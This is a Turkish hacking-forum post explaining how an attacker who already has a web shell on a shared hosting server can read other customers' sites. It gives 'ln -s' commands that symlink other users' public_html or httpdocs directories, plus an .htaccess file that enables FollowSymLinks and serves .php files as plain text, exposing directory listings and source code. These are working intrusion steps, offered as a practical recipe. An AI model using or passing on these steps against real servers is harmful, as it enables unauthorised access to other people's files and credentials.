Server Kök Dizin Bypass

Shellerdeki sym bir klasor oluşturur ve oraya çekmeye çalışır dosyayı sunucuda yazma izni olmadığı için işlem yapamazsınız ama bu sistemin çok basit bir yöntemi var ilk...


Shellerdeki sym bir klasor oluşturur ve oraya çekmeye çalışır dosyayı sunucuda yazma izni olmadığı için işlem yapamazsınız ama bu sistemin çok basit bir yöntemi var

ilk olarak run command ( komut yedirebildiğimi shell veya cgi telnet te olabilir )

Run command sistemini açıyoruz

1.Kod Linux Public_html ;

Kod:
"ln -s /home/çekmekistediğimizdizin/public_html/ asd.txt"
2.Kod Linux Httpdocs ;


Kod:
"ln -s /home/çekmekistediğinizdizin/httpdocs/ asd.txt"
Şeklinde yazıyoruz ve enterlıyoruz


Çektiğimiz dizin asd.txt olarak gelicektir. açmaya çalıştığınızda 403 forbidden hatası ile karşılaşıcaksınız.

Şimdi ise asd.txt nin olduğu yere .htaccess dosyası atıyoruz

.htaccess kodları ;

Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
bu kadar f5 çekmeniz yeterli dizinler karşımıza gelicektir.


Not ;bu htaccessi ana dizine asla atmayın shellinizin olduğu dizinede atmayın yoksa site down

ALINTIDIR...
 
131,795Konular
3,271,441Mesajlar
316,209Kullanıcılar
eeym3nlySon Üye
Üst Alt